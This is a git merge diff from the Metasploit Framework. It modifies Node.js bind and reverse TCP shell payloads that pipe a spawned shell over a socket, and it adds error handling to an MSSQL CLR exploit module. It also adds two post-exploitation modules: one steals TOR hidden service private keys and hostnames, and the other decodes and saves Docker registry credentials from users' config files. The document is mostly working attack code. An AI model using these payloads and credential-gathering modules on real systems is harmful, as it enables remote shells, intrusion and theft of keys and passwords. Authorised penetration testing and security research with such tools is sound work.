Merge branch 'master' of https://github.com/rapid7/metasploit-framework into add_smb1_scanner

Author: loftwing

lib/msf/core/payload/nodejs.rb

@@ -18,8 +18,13 @@ def nodejs_bind_tcp
         var server = net.createServer(function(socket) {  
           var sh = cp.spawn(cmd, []);
           socket.pipe(sh.stdin);
-          util.pump(sh.stdout, socket);
-          util.pump(sh.stderr, socket);
+          if (typeof util.pump === "undefined") {
+            sh.stdout.pipe(client.socket);
+            sh.stderr.pipe(client.socket);          
+          } else {
+            util.pump(sh.stdout, client.socket);
+            util.pump(sh.stderr, client.socket);
+          }
         });
         server.listen(#{datastore['LPORT']});
       })();
@@ -53,8 +58,13 @@ def nodejs_reverse_tcp(opts={})
         var client = this;
         client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
           client.socket.pipe(sh.stdin);
-          util.pump(sh.stdout, client.socket);
-          util.pump(sh.stderr, client.socket);
+          if (typeof util.pump === "undefined") {
+            sh.stdout.pipe(client.socket);
+            sh.stderr.pipe(client.socket);          
+          } else {
+            util.pump(sh.stdout, client.socket);
+            util.pump(sh.stderr, client.socket);
+          }
         });
       })();
     EOS

modules/exploits/windows/mssql/mssql_clr_payload.rb

@@ -96,7 +96,13 @@ def get_exploit_version(sql_version_string)
   end
 
   def set_trustworthy(on)
-      mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
+    result = mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
+    unless result[:errors].empty?
+      result[:errors].each do |err|
+        vprint_error(err)
+      end
+      fail_with(Failure::Unknown, "Failed to change Trustworthy setting")
+    end
   end
 
   def is_trustworthy
@@ -112,7 +118,13 @@ def enable_clr(enable)
 EXEC sp_configure 'clr enabled', #{enable ? 1 : 0};
 RECONFIGURE;
     ^
-    mssql_query(query, false)
+    result = mssql_query(query, false)
+    unless result[:errors].empty?
+      result[:errors].each do |err|
+        vprint_error(err)
+      end
+      fail_with(Failure::Unknown, "Failed to change CLR setting")
+    end
   end
 
   def is_clr_enabled

modules/nops/aarch64/simple.rb

@@ -40,4 +40,5 @@ def generate_sled(length, opts)
     end
     return ([nops[0]].pack("V*") * (length/4))
   end
-end
+end
+

modules/payloads/singles/cmd/unix/bind_nodejs.rb

@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1843
+  CachedSize = 2351
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

modules/payloads/singles/cmd/unix/reverse_nodejs.rb

@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1971
+  CachedSize = 2423
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

modules/payloads/singles/nodejs/shell_bind_tcp.rb

@@ -13,7 +13,7 @@
 
 module MetasploitModule
 
-  CachedSize = 456
+  CachedSize = 583
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

modules/payloads/singles/nodejs/shell_reverse_tcp.rb

@@ -13,7 +13,7 @@
 
 module MetasploitModule
 
-  CachedSize = 488
+  CachedSize = 601
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb

@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 516
+  CachedSize = 629
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

modules/post/linux/gather/tor_hiddenservices.rb

@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+# Adapted from post/linux/gather/enum_configs.rb
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Priv
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Linux Gather TOR Hidden Services',
+      'Description'   => %q{
+        This module collects the hostnames name and private keys of
+        any TOR Hidden Services running on the target machine. It
+        will search for torrc and if found, will parse it for the
+        directories of Hidden Services. However, root permissions
+        are required to read them as they are owned by the user that
+        TOR runs as, usually a separate account.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Harvey Phillips <xcellerator[at]gmx.com>',
+        ],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
+    ))
+  end
+
+  def run
+    distro = get_sysinfo
+    h = get_host
+    print_status("Running module against #{h}")
+    print_status("Info:")
+    print_status("\t#{distro[:version]}")
+    print_status("\t#{distro[:kernel]}")
+    print_status("Looking for torrc...")
+    find_torrc
+  end
+
+  def save(file, data, ltype, ctype="text/plain")
+    fname = ::File.basename(file)
+    loot = store_loot(ltype, ctype, session, data, fname)
+    print_status("#{fname} stored in #{loot.to_s}")
+  end
+
+  def get_host
+    case session.type
+    when /meterpreter/
+      host = sysinfo["Computer"]
+    when /shell/
+      host = cmd_exec("hostname").chomp
+    end
+
+    return host
+  end
+
+  def find_torrc
+    config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
+    if config.length == 0
+        print_error ("No torrc file found, maybe it goes by a different name?")
+    else
+        hidden = Array.new
+        # For every torrc file found, parse them for HiddenServiceDir
+        config.each do |c|
+            print_good("Torrc file found at #{c}")
+            services = cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
+            # For each HiddenServiceDir found in the torrc(s), push them to the hidden array
+            services.each do |s|
+                hidden.push(s)
+            end
+     end
+     # Remove any duplicate entries
+     hidden = hidden.uniq
+     # If hidden is empty, then no Hidden Services are running.
+     if hidden.length != 0
+         print_good("#{hidden.length} hidden services have been found!")
+     else
+         print_bad("No hidden services were found!")
+     end
+
+     if is_root?
+         # For all the Hidden Services found, loot hostname file
+         hidden.each do |f|
+         output = read_file("#{f}hostname")
+         save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/
+         end
+
+         # For all the Hidden Services found, loot private_key file
+         hidden.each do |f|
+            output = read_file("#{f}private_key")
+            save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/
+         end
+     else
+         print_error("Hidden Services were found, but we need root to access the directories")
+     end
+    end
+  end
+end

modules/post/multi/gather/docker_creds.rb

@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info(info,
+      'Name'           => 'Multi Gather Docker Credentials Collection',
+      'Description'    => %q{
+          This module will collect the contents of all users' .docker directories on the targeted
+          machine. If the user has already push to docker hub, chances are that the password was
+          saved in base64 (default behavior).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['Flibustier'],
+      'Platform'       => %w{ bsd linux osx unix },
+      'SessionTypes'   => ['shell']
+    ))
+  end
+
+  # This module is largely based on gpg_creds.rb.
+
+  def run
+    print_status("Finding .docker directories")
+    paths = enum_user_directories.map {|d| d + "/.docker"}
+    # Array#select! is only in 1.9
+    paths = paths.select { |d| directory?(d) }
+
+    if paths.nil? || paths.empty?
+      print_error("No users found with a .docker directory")
+      return
+    end
+
+    download_loot(paths)
+  end
+
+  def download_loot(paths)
+    print_status("Looting #{paths.count} directories")
+    paths.each do |path|
+      path.chomp!
+      file = "config.json"
+      target = "#{path}/#{file}"
+
+      if file? target
+        print_status("Downloading #{target} -> #{file}")
+        extract(target)
+      end
+    end
+  end
+
+  def extract(target)
+    file = read_file(target)
+    parsed = JSON.parse(file)
+    if parsed["auths"]
+      parsed["auths"].each do |key, value|
+        vprint_status("key: #{key}")
+        value.each do |k,v|
+          if k == "auth"
+            plain = Rex::Text.decode_base64(v)
+            if plain.include? ":"
+
+              print_good("Found #{plain}")
+              username, password = plain.split(':')
+              credential_data = {
+                origin_type: :import,
+              module_fullname: self.fullname,
+              filename: target,
+              workspace_id: myworkspace_id,
+              service_name: 'docker',
+              realm_value: key,
+              realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+              private_type: :password,
+              private_data: password,
+              username: username
+            }
+            create_credential(credential_data)
+
+            print_good("Saved credentials")
+            end
+          end
+        end
+      end
+    else
+      print_status("No credentials found in config file")
+    end
+  end
+end